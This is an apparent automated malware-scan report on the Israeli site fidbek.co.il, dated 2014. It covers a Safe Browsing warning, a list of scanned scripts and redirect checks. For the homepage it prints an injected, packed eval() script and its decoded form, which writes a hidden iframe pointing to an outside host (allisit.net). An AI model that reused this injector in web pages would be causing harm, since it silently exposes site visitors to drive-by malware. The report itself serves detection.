Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fidbek.co.il
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fidbek.co.il/ | 200 OK Content-Length: 222172 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|allisit|width|net||php|gtw3h|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://allisit.net/gtw3h.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://allisit.net/gtw3h.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://allisit.net/gtw3h.php"></ifee> | ||
http://fidbek.co.il/templates/fidbek/js/jquery-1.7.2.min.js | 200 OK Content-Length: 93637 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/templates/fidbek/js/jquery.cookie.js | 200 OK Content-Length: 1805 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/templates/fidbek/js/jquery.ratings.js | 200 OK Content-Length: 1565 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/templates/fidbek/js/jquery.imgareaselect.js | 200 OK Content-Length: 13823 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/templates/fidbek/js/jquery.scrollTo-min.js | 200 OK Content-Length: 2262 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/widgetkit/js/jquery.js | 200 OK Content-Length: 94412 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/cache/widgetkit/widgetkit-9e607433.js | 200 OK Content-Length: 19977 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/com_acymailing/js/acymailing_module.js?v=481 | 200 OK Content-Length: 14820 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/com_seonads/js/module.js | 200 OK Content-Length: 1001 Content-Type: application/x-javascript | clean |
http://fidbek.co.il/media/com_seonads/js/show_ads.js | 200 OK Content-Length: 13117 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fidbek.co.il
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: max-age=2592000
Connection: close
Date: Fri, 12 Dec 2014 19:17:05 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Sun, 11 Jan 2015 19:17:04 GMT
MS-Author-Via: DAV
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78b2162c5a1e7005efb04d83904aa0d0=pq3ft9nua9ut15emds1ikat4d1; path=/
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: fidbek.co.il
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: max-age=2592000
Connection: close
Date: Fri, 12 Dec 2014 19:17:05 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Sun, 11 Jan 2015 19:17:04 GMT
MS-Author-Via: DAV
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78b2162c5a1e7005efb04d83904aa0d0=pq3ft9nua9ut15emds1ikat4d1; path=/
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: fidbek.co.il
Referer: http://www.google.com/search?q=fidbek.co.il
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fidbek.co.il
Referer: http://www.google.com/search?q=fidbek.co.il
Result:
The result is similar to the first query. There are no suspicious redirects found.